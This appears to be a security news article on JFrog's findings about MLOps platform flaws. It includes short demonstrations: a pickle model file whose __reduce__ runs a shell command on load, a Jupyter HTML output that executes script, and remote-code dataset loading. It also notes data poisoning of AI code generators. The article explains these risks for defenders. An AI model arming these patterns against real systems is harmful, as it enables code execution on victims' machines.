Researchers are warning about security risks in the machine learning (ML) software supply chain after identifying more than 20 vulnerabilities that could be exploited to target MLOps platforms.
These vulnerabilities, described as inherent and implementation-based flaws, could have severe consequences, ranging from arbitrary code execution to the loading of malicious datasets.
MLOps platforms offer the ability to design and execute machine learning model pipelines, with a model registry acting as a centralized repository for storing and version-controlling trained models. These models can then be embedded within an application or made available for other clients to query via an Application Programming Interface (API), effectively turning the models into a service.
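For context, serving a model through an API usually amounts to exposing it behind an HTTP endpoint that clients post inputs to. The sketch below is a generic illustration only; the host, path, and payload fields are hypothetical and not tied to any particular MLOps platform.

```python
import requests

# Hypothetical inference endpoint exposed by a model-serving platform.
# The exact URL scheme and request payload format vary by platform.
response = requests.post(
    "https://models.example.com/v1/models/churn-predictor/predict",
    json={"instances": [{"tenure_months": 14, "monthly_spend": 42.5}]},
    timeout=10,
)
print(response.json())
```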
According to a report from JFrog researchers, inherent vulnerabilities are flaws that stem from the underlying formats and processes used in the target technology.
Examples of inherent vulnerabilities include abusing ML models to run attacker-controlled code, taking advantage of the fact that many model formats support automatic code execution upon loading (for instance, pickle-based model files).
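To illustrate why loading alone is dangerous, the following minimal sketch uses Python's standard pickle module; the file and class names are hypothetical, and the payload is a harmless shell echo standing in for attacker-controlled code.

```python
import os
import pickle

class MaliciousModel:
    # pickle invokes __reduce__ during deserialization, so the callable it
    # returns is executed as soon as the file is loaded -- no method call
    # on the "model" is ever required.
    def __reduce__(self):
        return (os.system, ("echo attacker-controlled code runs on load",))

# An attacker publishes this file as a "trained model" artifact.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# A victim merely loading the model triggers the payload.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```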
The same behavior extends to certain dataset formats and libraries, which allow automatic code execution when a dataset is loaded, potentially opening the door to malware attacks simply by loading a publicly available dataset.
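One widely known example of this pattern (offered here as illustration, not as a specific finding from the report) is Hugging Face's datasets library, which can run a dataset's bundled Python loading script when the caller opts in; the repository name below is hypothetical.

```python
from datasets import load_dataset

# Some hub datasets ship a custom Python loading script. With
# trust_remote_code=True, that script is downloaded and executed locally,
# so a malicious dataset author gains code execution on the data
# scientist's machine the moment the dataset is loaded.
ds = load_dataset("some-org/some-dataset", trust_remote_code=True)
```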
Another example concerns JupyterLab, the successor to the classic Jupyter Notebook interface: a web-based interactive computing environment that lets users execute blocks (or cells) of code and view the results.
The researchers pointed to an issue that often goes unnoticed: the handling of HTML output when running code blocks in Jupyter. The output of Python code may emit HTML and JavaScript, which the browser will happily render.
The concern is that the JavaScript output is not sandboxed from the parent web application, and that the parent web application can automatically run arbitrary Python code.
In other words, an attacker could output malicious JavaScript that adds a new cell to the current JupyterLab notebook, injects Python code into it, and then executes it. This is particularly relevant when exploiting a cross-site scripting (XSS) vulnerability.
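To make the mechanism concrete, here is a minimal and deliberately harmless sketch of how a cell's output can smuggle script into the notebook page. The payload is only a placeholder; an actual exploit would instead use the notebook front end's JavaScript API to insert and execute a new Python cell.

```python
from IPython.display import HTML, display

# If the front end renders this output without sandboxing it, the onerror
# handler executes as JavaScript in the context of the notebook page itself.
display(HTML('<img src="x" onerror="console.log(\'script running in the notebook page\')">'))
```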
One such vulnerability, carrying a CVSS score of 7.5, stemmed from insufficient sanitization of untrusted input, resulting in an XSS attack that ultimately allows client-side code execution in JupyterLab.
Researchers underscored a crucial takeaway: ML libraries with XSS vulnerabilities must be treated as potential vectors for arbitrary code execution, given that data scientists may utilize these libraries within Jupyter Notebook environments.
The second category covers implementation weaknesses, such as a lack of authentication in MLOps platforms, which could allow a threat actor with network access to gain code execution capabilities by abusing the ML pipeline feature and thereby compromise the system.
These weaknesses are no longer hypothetical: financially motivated actors have already abused them, as in the case of an unpatched Anyscale Ray vulnerability (CVSS score: 9.8) that was exploited to deploy cryptocurrency miners.
Another implementation weakness is a container escape vulnerability in Seldon Core that enables attackers to go beyond code execution, moving laterally across the cloud environment and accessing other users' models and datasets by uploading a malicious model to the inference server.
The net outcome is that chaining these vulnerabilities could allow attackers not only to infiltrate and spread within an organization, but also to compromise its servers.
“When deploying a platform that enables model serving, it’s crucial to recognize that anyone authorized to deploy a new model can potentially execute arbitrary code on that server,” the researchers warned. “Verify that the environment running the model is completely isolated and hardened against any potential escape or breach.”
The disclosure follows the identification by Palo Alto Networks’ Unit 42 of two now-patched vulnerabilities in the open-source LangChain generative AI framework, CVE-2023-46229 and CVE-2023-44467, which, if exploited, could have enabled attackers to execute arbitrary code or gain unauthorized access to sensitive information.
Last month, Trail of Bits disclosed vulnerabilities in Ask Astro, an open-source Retrieval Augmented Generation (RAG) chatbot application, that could lead to chatbot output poisoning, inaccurate document ingestion, and potential denial-of-service (DoS) attacks.
As security concerns around AI continue to mount, attention has also turned to data poisoning, in which training data is deliberately contaminated to trick large language models (LLMs) into producing flawed or insecure output.
“In contrast to existing attacks that conceal malicious payloads in detectable or innocuous sections of the code, CodeBreaker leverages large language models (LLMs) such as GPT-4 for sophisticated payload transformation, ensuring that both the poisoned data and the generated code can evade strong vulnerability detection.”